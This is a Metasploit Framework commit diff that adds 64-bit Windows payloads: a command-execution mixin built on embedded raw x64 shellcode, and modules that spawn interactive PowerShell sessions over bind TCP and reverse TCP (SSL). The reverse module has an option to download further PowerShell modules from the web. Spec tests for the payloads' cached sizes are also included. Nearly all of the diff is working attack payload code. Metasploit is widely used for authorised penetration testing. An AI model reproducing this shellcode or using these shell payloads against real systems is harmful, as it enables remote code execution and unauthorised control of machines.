Lands #5446, support for 64-bit native powershell payloads

2024-09-11 17:08:02 +02:00 · 2015-06-07 14:16:19 -05:00 · 2015-06-07 14:16:19 -05:00 · 1f11cd5470
commit 1f11cd5470
parent 0557d213c1 20b605e7cb
4 changed files with 207 additions and 0 deletions
--- a/lib/msf/core/payload/windows/exec_x64.rb
+++ b/lib/msf/core/payload/windows/exec_x64.rb
@ -0,0 +1,67 @@
+# -*- coding: binary -*-
+
+module Msf
+
+###
+#
+# Common command execution implementation for Windows.
+#
+###
+
+module Payload::Windows::Exec_x64
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Single
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Windows x64 Execute Command',
+      'Description'   => 'Execute an arbitrary command (Windows x64)',
+      'Author'        => [ 'sf' ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86_64,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'EXITFUNC' => [ 229, 'V' ]
+            },
+          'Payload' =>
+            "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
+            "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
+            "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
+            "\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
+            "\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88" +
+            "\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44" +
+            "\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48" +
+            "\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1" +
+            "\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44" +
+            "\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49" +
+            "\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A" +
+            "\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41" +
+            "\x59\x5A\x48\x8B\x12\xE9\x57\xFF\xFF\xFF\x5D\x48\xBA\x01\x00\x00" +
+            "\x00\x00\x00\x00\x00\x48\x8D\x8D\x01\x01\x00\x00\x41\xBA\x31\x8B" +
+            "\x6F\x87\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF" +
+            "\xD5\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47" +
+            "\x13\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5"
+        }
+      ))
+    register_options(
+      [
+        OptString.new('CMD', [ true, "The command string to execute" ]),
+      ], self.class )
+  end
+
+  def generate
+    return super + command_string + "\x00"
+  end
+
+  def command_string
+    return datastore['CMD'] || ''
+  end
+
+end
+
+end
+
--- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
@ -0,0 +1,60 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/payload/windows/exec_x64'
+require 'msf/core/payload/windows/powershell'
+require 'msf/base/sessions/powershell'
+require 'msf/core/handler/bind_tcp'
+
+###
+#
+# Extends the Exec payload to add a new user.
+#
+###
+module Metasploit3
+
+  CachedSize = 1778
+
+  include Msf::Payload::Windows::Exec_x64
+  include Rex::Powershell::Command
+  include Msf::Payload::Windows::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Windows Interactive Powershell Session, Bind TCP',
+      'Description'   => 'Listen for a connection and spawn an interactive powershell session',
+      'Author'        =>
+        [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::PowerShell,
+      ))
+
+    # Register command execution options
+    register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+      ], self.class)
+    # Hide the CMD option...this is kinda ugly
+    deregister_options('CMD')
+  end
+
+  #
+  # Override the exec command string
+  #
+  def command_string
+    generate_powershell_code("Bind")
+  end
+end
--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@ -0,0 +1,60 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/payload/windows/exec_x64'
+require 'msf/core/payload/windows/powershell'
+require 'msf/base/sessions/powershell'
+require 'msf/core/handler/reverse_tcp_ssl'
+
+###
+#
+# Extends the Exec payload to add a new user.
+#
+###
+module Metasploit3
+
+  CachedSize = 1786
+
+  include Msf::Payload::Windows::Exec_x64
+  include Msf::Payload::Windows::Powershell
+  include Rex::Powershell::Command
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Windows Interactive Powershell Session, Reverse TCP',
+      'Description'   => 'Listen for a connection and spawn an interactive powershell session',
+      'Author'        =>
+        [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'Session'       => Msf::Sessions::PowerShell,
+      ))
+
+    # Register command execution options
+    register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+      ], self.class)
+    # Hide the CMD option...this is kinda ugly
+    deregister_options('CMD')
+  end
+
+  #
+  # Override the exec command string
+  #
+  def command_string
+    generate_powershell_code("Reverse")
+  end
+end
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@ -3827,6 +3827,26 @@ describe 'modules/payloads', :content do
                          reference_name: 'windows/x64/meterpreter_reverse_tcp'
  end

+  context 'windows/x64/powershell_bind_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/windows/x64/powershell_bind_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/x64/powershell_bind_tcp'
+  end
+
+  context 'windows/x64/powershell_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/windows/x64/powershell_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/x64/powershell_reverse_tcp'
+  end
+  
  context 'windows/x64/shell/bind_tcp' do
    it_should_behave_like 'payload cached size is consistent',
                          ancestor_reference_names: [